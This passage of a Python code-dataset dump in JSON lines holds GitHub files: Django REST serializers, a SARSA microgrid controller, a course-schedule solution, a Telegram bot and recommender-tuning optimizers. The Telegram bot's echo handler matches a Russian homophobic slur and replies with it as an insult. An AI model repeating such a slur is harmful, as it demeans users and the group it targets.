"select.select", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 186, "usage_type": "call"}]}
+{"seq_id": "31175113368", "text": "from rest_framework import serializers\nfrom apitest.models import Cube, Addcube\n\nclass CubeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cube\n fields = ['id', 'character_name', 'create_date', 'cube_type', 'item_upgrade_result','item_level',\n 'target_item','potential_option_grade','before_options_value1','before_options_grade1',\n 'before_options_value2','before_options_grade2','before_options_value3','before_options_grade3',\n 'after_options_value1','after_options_grade1','after_options_value2','after_options_grade2',\n 'after_options_value3','after_options_grade3']", "repo_name": "JunHeeMerong/JunBlog", "sub_path": "apitest/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 671, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 4, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 4, "usage_type": "name"}, {"api_name": "apitest.models.Cube", "line_number": 6, "usage_type": "name"}]}
+{"seq_id": "42295928488", "text": "from rest_framework import serializers\nfrom .models import DocFile\nimport ipdb\n\n\nclass ParseSerializer(serializers.ModelSerializer):\n file = serializers.FileField()\n\n class Meta:\n model = DocFile\n fields = [\"file\"]\n\n def create(self, validated_data):\n\n # for key, value in validated_data.items():\n # ipdb.set_trace()\n\n return DocFile.objects.create(**validated_data)\n", "repo_name": "Marchi8/desafio_backend", "sub_path": "parser/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 415, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "rest_framework.serializers.FileField", "line_number": 7, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "models.DocFile", "line_number": 10, "usage_type": "name"}, {"api_name": "models.DocFile.objects.create", "line_number": 18, "usage_type": "call"}, {"api_name": "models.DocFile.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.DocFile", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "12540466655", "text": "\"\"\"\nSARSA Controller\n\nTrain a value function using the SARSA controller with the tile coding approximation\n\nInputs : name of previous value function, \n name of new value function, \n number of episodes, \n steps per episode,\n action frequency in seconds,\n exploration rate,\n alpha,\n beta\n\nOutputs : Creates new value function weights pickle file in Value Function directory,\n Plots Network durnig training\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport pickle\nimport random\n\nimport itertools\nfrom Microgrids_Network_env_fix import *\nfrom vf_tile_coding_approx import ValueFunction\n\n\nclass SarsaController:\n def __init__(self, exp_rate=0.12, beta=0.01): #reward very high, lower value with beta\n \n b = [[0,1], [0,1], [0,1], [0,1], [0,1]]\n self.actions = list(itertools.product(*b))\n self.state = [[0,0,0], [0,0,0], [0,0,0],[0,0,0], [0,0,0], 0,0, 0,0,0,0,0 ] # see above\n\n self.exp_rate = exp_rate\n self.beta = beta\n \n #stabilizer test\n self.old_action = random.choice(self.actions)\n\n def chooseAction(self, new_state, valueFunc):\n \n v_best = float('-inf')\n action = []\n\n if np.random.uniform(0, 1) <= self.exp_rate:\n action = random.choice(self.actions)\n \n else:\n for a in self.actions:\n v = valueFunc.value(new_state, a)\n if v > v_best:\n v_best = v\n action = a\n\n return action\n\n def run(self, network, valueFunc, steps=1000, inner_steps=100, idle_iter=50, debug=False ):\n \n avg_reward = 0\n total_reward = 0\n\n #Random initialization\n network.reset()\n cur_action = random.choice(self.actions)\n cur_state = network.state\n\n for i in range(1, steps + 1):\n \n mean_reward = 0\n #take average reward during idle_iter \n for k in range(0, idle_iter): #step the network several times so it inputs a control at most every 1 ms (otehrwise too fast, exp growth)\n new_state, reward, _,_ = network.step(cur_action)\n mean_reward += reward\n\n mean_reward /= idle_iter\n\n new_action = self.chooseAction(new_state, valueFunc)\n\n total_reward += reward\n if debug:\n print(\"state {} action {} reward {}\".format(cur_state, cur_action, reward))\n if i % inner_steps == 0:\n print(\"step {} -> avg reward {} total reward {}\".format(i, avg_reward, total_reward))\n\n delta = reward - avg_reward + valueFunc.value(new_state, new_action) - valueFunc.value(cur_state,\n cur_action)\n avg_reward += self.beta * delta\n valueFunc.update(cur_state, cur_action, delta)\n\n cur_state = new_state\n cur_action = new_action\n\n #Stopping criterion if V too high\n highest_V = 0.0\n\n for j in range(0,4):\n if(cur_state[j] > highest_V):\n highest_V = cur_state[j]\n \n if(highest_V >= 120.0):\n print('Explored out of bounds, next episode')\n print('i : ', i, 'highest V : ', highest_V, 'average_reward : ', avg_reward)\n break\n\n\ndef train_sarsa(prev_vf = None , new_vf = 'new_vf_weights', episode_num = 20, episode_steps = 90, \n action_delay = 2, exploration_rate = 0.12, alpha = 0.01, beta = 0.01):\n \n print('Starting training with SARSA for {}'.format(new_vf))\n\n #convert time to iterations\n action_freq = int(action_delay/T)\n\n # Initialize Network\n network = MicrogridsNetwork()\n episode = 0\n\n sa = SarsaController(exp_rate= exploration_rate , beta = beta)\n vf = ValueFunction(alpha)\n\n #Use previous value function\n if(prev_vf != None):\n with open('Value_Functions/{}.p'.format(prev_vf), 'rb') as pfile:\n vf.weights = pickle.load(pfile)\n\n while(episode < episode_num):\n\n sa.run(network, vf, steps=episode_steps, 
inner_steps=150, idle_iter = action_freq, debug=False)\n episode +=1\n print('episode ' , episode, 'time : ', \"{:.2f}\".format(episode*episode_steps*action_freq*T),' seconds')\n\n #Store value function using pickles\n with open('Value_Functions/{}.p'.format(new_vf), 'wb') as pfile:\n pickle.dump(vf.weights, pfile)\n \n network.plot(timetoplot = int(episode_num*episode_steps*action_freq*T) )\n\n", "repo_name": "Maxime00/Microgrids_Project", "sub_path": "Final_Model/SARSA_Controller.py", "file_name": "SARSA_Controller.py", "file_ext": "py", "file_size_in_byte": 4624, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.product", "line_number": 34, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 49, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 67, "usage_type": "call"}, {"api_name": "vf_tile_coding_approx.ValueFunction", "line_number": 122, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 127, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 137, "usage_type": "call"}]}
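The learning rule buried in run() above is average-reward (differential) semi-gradient SARSA: the TD error subtracts a running reward-rate estimate instead of applying a discount factor, and that estimate is itself nudged by beta on every step. Stripped of the grid plumbing, one update looks like this, where q stands for any value function exposing the record's value/update interface and the names are illustrative:

def sarsa_step(q, s, a, r, s2, a2, avg_reward, beta):
    # delta = R - R_bar + Q(s', a') - Q(s, a)
    delta = r - avg_reward + q.value(s2, a2) - q.value(s, a)
    avg_reward += beta * delta      # R_bar tracks the long-run reward rate
    q.update(s, a, delta)           # semi-gradient step on the tile-coding weights
    return avg_reward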
+{"seq_id": "38795657412", "text": "class Solution:\n def canFinish(self, numCourses: int, prerequisites):\n import collections\n # 存储有向图\n edges = collections.defaultdict(list)\n # 存储每个节点的入度\n indeg = [0] * numCourses\n for info in prerequisites:\n edges[info[1]].append(info[0])\n indeg[info[0]] += 1\n # 将所有入度为 0 的节点放入队列中\n q = collections.deque([u for u in range(numCourses) if indeg[u] == 0])\n while q:\n # 从队首取出一个节点\n u = q.popleft()\n for v in edges[u]:\n indeg[v] -= 1\n if indeg[v] == 0:\n q.append(v)\n for i in indeg:\n if i > 0:\n return False\n return True\n", "repo_name": "saycmily/vtk-and-python", "sub_path": "leecode/1-500/201-300/207-课程表.py", "file_name": "207-课程表.py", "file_ext": "py", "file_size_in_byte": 797, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 5, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "33395522802", "text": "import logging\nimport config\nimport keyboards as kb\nimport telegramcalendar as tgcalendar\nimport spreadsheet\nimport data\nfrom aiogram import Bot, Dispatcher, executor, types\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO)\n# Initialize bot and dispatcher\nbot = Bot(token=config.API_TOKEN)\ndp = Dispatcher(bot)\n\n\n@dp.callback_query_handler(lambda c: c.data == 'button1')\nasync def process_callback_button1(callback_query: types.CallbackQuery):\n await bot.answer_callback_query(callback_query.id)\n await bot.send_message(callback_query.from_user.id, 'Нажата первая кнопка!')\n\n\n@dp.callback_query_handler(lambda c: c.data.startswith('recall'))\nasync def process_callback_button1(callback_query: types.CallbackQuery):\n if callback_query.data == 'recall_yes':\n data.collect_data('Да', callback_query.from_user.id)\n await bot.send_message(callback_query.from_user.id, 'Отлично, мы вам перезвоним')\n if callback_query.data == 'recall_no':\n data.collect_data('Нет', callback_query.from_user.id)\n await bot.send_message(callback_query.from_user.id, 'Хорошо, приходите на праздник!')\n await bot.answer_callback_query(callback_query.id)\n\n\n@dp.callback_query_handler(lambda c: c.data.startswith('program'))\nasync def process_callback_button1(callback_query: types.CallbackQuery):\n await bot.answer_callback_query(callback_query.id)\n data.collect_data(callback_query.data, callback_query.from_user.id)\n await bot.edit_message_text(text=f'Вы выбрали {callback_query.data[7]} программу',\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id)\n await bot.send_message(callback_query.from_user.id, 'Пожалуйста, напишите свой номер телефона')\n\n\n@dp.callback_query_handler(lambda c: c.data == 'yes' or c.data == 'no')\nasync def choose_callback(callback_query: types.CallbackQuery):\n if callback_query.data == 'yes':\n await bot.edit_message_text(text=f\"Пожалуйста, выберите программу\",\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id,\n reply_markup=kb.program)\n elif callback_query.data == 'no':\n await bot.edit_message_text(text=f\"Ясно!\",\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id)\n else:\n await bot.edit_message_text(text=f\"Что-то пошло не так :(\",\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id)\n await bot.answer_callback_query(callback_query.id)\n\n\n@dp.callback_query_handler(lambda c: c.data)\nasync def callback_calendar(callback_query: types.CallbackQuery):\n response = tgcalendar.process_calendar_selection(bot, callback_query)\n data.collect_data(response[2], callback_query.from_user.id)\n await response[0]\n await bot.answer_callback_query(callback_query.id)\n\n\n@dp.message_handler(commands=['calendar'])\nasync def calendar(message: types.Message):\n cld = tgcalendar.create_calendar()\n await message.answer('Пожалуйтса, выберите дату:', reply_markup=cld)\n\n\n@dp.message_handler(lambda c: c.text[0] == '+' or c.text[0] + c.text[1] == '80')\nasync def test(message: types.Message):\n data.collect_data(message.text, message.from_user.id)\n await message.answer(f'Супер!\\n{message.from_user.first_name}, хотите ли вы, чтобы мы вам перезвонили?',\n reply_markup=kb.recall)\n\n\n@dp.message_handler(commands=['1'])\nasync def process_command_1(message: types.Message):\n markup = kb.inline_kb1\n await message.reply(\"Первая инлайн кнопка\", 
reply_markup=markup)\n\n\n@dp.message_handler(commands=['start', 'help'])\nasync def send_welcome(message: types.Message):\n \"\"\"\n This handler will be called when user sends `/start` or `/help` command\n \"\"\"\n await message.answer(\"Здарова!\\n\"\n \"Я тестовый бот\\n\"\n \"Напиши /calendar чтобы протестировать самую свежую функцию!\")\n\n\n@dp.message_handler(commands=['rm'])\nasync def removekb(message: types.Message):\n await message.answer('Removed!', reply_markup=kb.ReplyKeyboardRemove())\n\n\n@dp.message_handler(commands=['ping'])\nasync def pong(message: types.Message):\n await message.reply('pong')\n\n\n@dp.message_handler()\nasync def echo(message: types.Message):\n text = message.text.lower()\n if text.find('пидор') == -1:\n await message.answer(message.text)\n else:\n await message.answer('Сам пидор!')\n print(message.from_user.full_name, message.text)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp)\n", "repo_name": "VanderY/TGBot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 5140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "aiogram.Bot", "line_number": 12, "usage_type": "call"}, {"api_name": "config.API_TOKEN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "aiogram.Dispatcher", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 17, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 23, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 23, "usage_type": "name"}, {"api_name": "data.collect_data", "line_number": 25, "usage_type": "call"}, {"api_name": "data.collect_data", "line_number": 28, "usage_type": "call"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 34, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 34, "usage_type": "name"}, {"api_name": "data.collect_data", "line_number": 36, "usage_type": "call"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 44, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 44, "usage_type": "name"}, {"api_name": "keyboards.program", "line_number": 49, "usage_type": "attribute"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 62, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 62, "usage_type": "name"}, {"api_name": "telegramcalendar.process_calendar_selection", "line_number": 63, "usage_type": "call"}, {"api_name": "data.collect_data", "line_number": 64, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 70, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 70, "usage_type": "name"}, {"api_name": "telegramcalendar.create_calendar", "line_number": 71, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 76, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 76, "usage_type": "name"}, {"api_name": "data.collect_data", "line_number": 77, "usage_type": "call"}, {"api_name": "keyboards.recall", "line_number": 79, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 83, "usage_type": "attribute"}, {"api_name": "aiogram.types", 
"line_number": 83, "usage_type": "name"}, {"api_name": "keyboards.inline_kb1", "line_number": 84, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 89, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 89, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 99, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 99, "usage_type": "name"}, {"api_name": "keyboards.ReplyKeyboardRemove", "line_number": 100, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 104, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 104, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 109, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 109, "usage_type": "name"}, {"api_name": "aiogram.executor.start_polling", "line_number": 119, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 119, "usage_type": "name"}]}
+{"seq_id": "33818302092", "text": "import logging\nfrom typing import Any, Dict, List, Optional\n\nfrom irspack.definitions import InteractionMatrix\n\nfrom ..evaluator import Evaluator\nfrom ..optimizers.base_optimizer import (\n BaseOptimizer,\n BaseOptimizerWithEarlyStopping,\n LowMemoryError,\n)\nfrom ..parameter_tuning import (\n CategoricalSuggestion,\n IntegerSuggestion,\n LogUniformSuggestion,\n Suggestion,\n UniformSuggestion,\n)\nfrom ..recommenders import (\n AsymmetricCosineKNNRecommender,\n AsymmetricCosineUserKNNRecommender,\n CosineKNNRecommender,\n CosineUserKNNRecommender,\n DenseSLIMRecommender,\n EDLAERecommender,\n IALSRecommender,\n JaccardKNNRecommender,\n P3alphaRecommender,\n RP3betaRecommender,\n SLIMRecommender,\n TopPopRecommender,\n TverskyIndexKNNRecommender,\n)\n\ndefault_tune_range_knn = [\n IntegerSuggestion(\"top_k\", 4, 1000),\n UniformSuggestion(\"shrinkage\", 0, 1000),\n]\n\ndefault_tune_range_knn_with_weighting = [\n IntegerSuggestion(\"top_k\", 4, 1000),\n UniformSuggestion(\"shrinkage\", 0, 1000),\n CategoricalSuggestion(\"feature_weighting\", [\"NONE\", \"TF_IDF\", \"BM_25\"]),\n]\n\n\ndef _get_maximal_n_components_for_budget(\n X: InteractionMatrix, budget: int, n_component_max_default: int\n) -> int:\n return min(int((budget * 1e6) / (8 * (sum(X.shape) + 1))), n_component_max_default)\n\n\nclass TopPopOptimizer(BaseOptimizer):\n default_tune_range: List[Suggestion] = []\n recommender_class = TopPopRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n return []\n\n\nclass IALSOptimizer(BaseOptimizerWithEarlyStopping):\n default_tune_range = [\n IntegerSuggestion(\"n_components\", 4, 300),\n LogUniformSuggestion(\"alpha0\", 3e-3, 1),\n LogUniformSuggestion(\"reg\", 1e-4, 1e-1),\n ]\n recommender_class = IALSRecommender\n\n def __init__(\n self,\n data: InteractionMatrix,\n val_evaluator: Evaluator,\n logger: Optional[logging.Logger] = None,\n suggest_overwrite: List[Suggestion] = [],\n fixed_params: Dict[str, Any] = {},\n max_epoch: int = 16,\n validate_epoch: int = 1,\n score_degradation_max: int = 5,\n ):\n super().__init__(\n data,\n val_evaluator,\n logger=logger,\n suggest_overwrite=suggest_overwrite,\n fixed_params=fixed_params,\n max_epoch=max_epoch,\n validate_epoch=validate_epoch,\n score_degradation_max=score_degradation_max,\n )\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 300)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n\nclass DenseSLIMOptimizer(BaseOptimizer):\n default_tune_range: List[Suggestion] = [LogUniformSuggestion(\"reg\", 1, 1e4)]\n recommender_class = DenseSLIMRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_items: int = X.shape[1]\n if (1e6 * memory_budget) < (4 * 2 * n_items ** 2):\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for DenseSLIM to work.\"\n )\n return []\n\n\nclass EDLAEOptimizer(BaseOptimizer):\n default_tune_range: List[Suggestion] = [\n LogUniformSuggestion(\"reg\", 1, 1e4),\n UniformSuggestion(\"dropout_p\", 0.0, 0.99),\n ]\n recommender_class = EDLAERecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_items: int = X.shape[1]\n if 
(1e6 * memory_budget) < (4 * 2 * n_items ** 2):\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for EDLAE to work.\"\n )\n return []\n\n\ntry:\n from irspack.recommenders import NMFRecommender, TruncatedSVDRecommender\n\n class TruncatedSVDOptimizer(BaseOptimizer):\n default_tune_range = [IntegerSuggestion(\"n_components\", 4, 512)]\n recommender_class = TruncatedSVDRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 512)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n class NMFOptimizer(BaseOptimizer):\n default_tune_range = [\n IntegerSuggestion(\"n_components\", 4, 512),\n LogUniformSuggestion(\"alpha\", 1e-10, 1e-1),\n UniformSuggestion(\"l1_ratio\", 0, 1),\n ]\n recommender_class = NMFRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 512)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n\nexcept ImportError: # pragma: no cover\n pass # pragma: no cover\n\n\nclass SimilarityBasedOptimizerBase(BaseOptimizer):\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n top_k_max = min(int(1e6 * memory_budget / 4 // (X.shape[1] + 1)), 1024)\n if top_k_max <= 4:\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for {cls.__name__} to work.\"\n )\n\n return [\n IntegerSuggestion(\"top_k\", 4, top_k_max),\n ]\n\n\nclass SLIMOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = [\n LogUniformSuggestion(\"alpha\", 1e-5, 1),\n UniformSuggestion(\"l1_ratio\", 0, 1),\n ]\n recommender_class = SLIMRecommender\n\n\nclass P3alphaOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = [\n IntegerSuggestion(\"top_k\", low=10, high=1000),\n CategoricalSuggestion(\"normalize_weight\", [True, False]),\n ]\n recommender_class = P3alphaRecommender\n\n\nclass RP3betaOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = [\n IntegerSuggestion(\"top_k\", 2, 1000),\n LogUniformSuggestion(\"beta\", 1e-5, 5e-1),\n CategoricalSuggestion(\"normalize_weight\", [True, False]),\n ]\n recommender_class = RP3betaRecommender\n\n\nclass CosineKNNOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting.copy() + [\n CategoricalSuggestion(\"normalize\", [False, True])\n ]\n\n recommender_class = CosineKNNRecommender\n\n\nclass AsymmetricCosineKNNOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting + [\n UniformSuggestion(\"alpha\", 0, 1)\n ]\n\n recommender_class = AsymmetricCosineKNNRecommender\n\n\nclass JaccardKNNOptimizer(SimilarityBasedOptimizerBase):\n\n default_tune_range = default_tune_range_knn.copy()\n recommender_class = JaccardKNNRecommender\n\n\nclass TverskyIndexKNNOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn.copy() + [\n UniformSuggestion(\"alpha\", 0, 2),\n UniformSuggestion(\"beta\", 0, 2),\n ]\n\n recommender_class = TverskyIndexKNNRecommender\n\n\nclass UserSimilarityBasedOptimizerBase(BaseOptimizer):\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n top_k_max = min(int(1e6 * memory_budget / 4 // 
(X.shape[0] + 1)), 1024)\n return [\n IntegerSuggestion(\"top_k\", 4, top_k_max),\n ]\n\n\nclass CosineUserKNNOptimizer(UserSimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting.copy() + [\n CategoricalSuggestion(\"normalize\", [False, True])\n ]\n\n recommender_class = CosineUserKNNRecommender\n\n\nclass AsymmetricCosineUserKNNOptimizer(UserSimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting + [\n UniformSuggestion(\"alpha\", 0, 1)\n ]\n\n recommender_class = AsymmetricCosineUserKNNRecommender\n\n\ntry:\n from ..recommenders.bpr import BPRFMRecommender\n\n class BPRFMOptimizer(BaseOptimizerWithEarlyStopping):\n default_tune_range = [\n IntegerSuggestion(\"n_components\", 4, 256),\n LogUniformSuggestion(\"item_alpha\", 1e-9, 1e-2),\n LogUniformSuggestion(\"user_alpha\", 1e-9, 1e-2),\n CategoricalSuggestion(\"loss\", [\"bpr\", \"warp\"]),\n ]\n recommender_class = BPRFMRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n # memory usage will be roughly 4 (float) * (n_users + n_items) * k\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 300)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n\nexcept: # pragma: no cover\n pass # pragma: no cover\n\n\ntry:\n from ..recommenders.multvae import MultVAERecommender\n\n class MultVAEOptimizer(BaseOptimizerWithEarlyStopping):\n default_tune_range = [\n CategoricalSuggestion(\"dim_z\", [32, 64, 128, 256]),\n CategoricalSuggestion(\"enc_hidden_dims\", [128, 256, 512]),\n CategoricalSuggestion(\"kl_anneal_goal\", [0.1, 0.2, 0.4]),\n ]\n recommender_class = MultVAERecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n if memory_budget * 1e6 > (X.shape[1] * 2048 * 8):\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for MultVAE to work.\"\n )\n\n return []\n\n\nexcept: # pragma: no cover\n pass # pragma: no cover\n", "repo_name": "caijunyang308/irspack", "sub_path": "irspack/optimizers/_optimizers.py", "file_name": "_optimizers.py", "file_ext": "py", "file_size_in_byte": 10167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 36, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 37, "usage_type": "call"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 41, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 42, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 43, "usage_type": "call"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 48, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 54, "usage_type": "name"}, {"api_name": "recommenders.TopPopRecommender", "line_number": 55, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 60, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 60, "usage_type": "name"}, {"api_name": 
"optimizers.base_optimizer.BaseOptimizerWithEarlyStopping", "line_number": 64, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 66, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 67, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 68, "usage_type": "call"}, {"api_name": "recommenders.IALSRecommender", "line_number": 70, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 74, "usage_type": "name"}, {"api_name": "evaluator.Evaluator", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 76, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 76, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 77, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 78, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 96, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 100, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 97, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 97, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 104, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 105, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 105, "usage_type": "name"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 105, "usage_type": "call"}, {"api_name": "recommenders.DenseSLIMRecommender", "line_number": 106, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 110, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 114, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 111, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 111, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 120, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 121, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 121, "usage_type": "name"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 122, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 123, "usage_type": "call"}, {"api_name": "recommenders.EDLAERecommender", "line_number": 125, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 129, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 133, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 130, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 130, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 142, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 143, "usage_type": "call"}, {"api_name": "irspack.recommenders.TruncatedSVDRecommender", "line_number": 144, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 148, "usage_type": "name"}, {"api_name": 
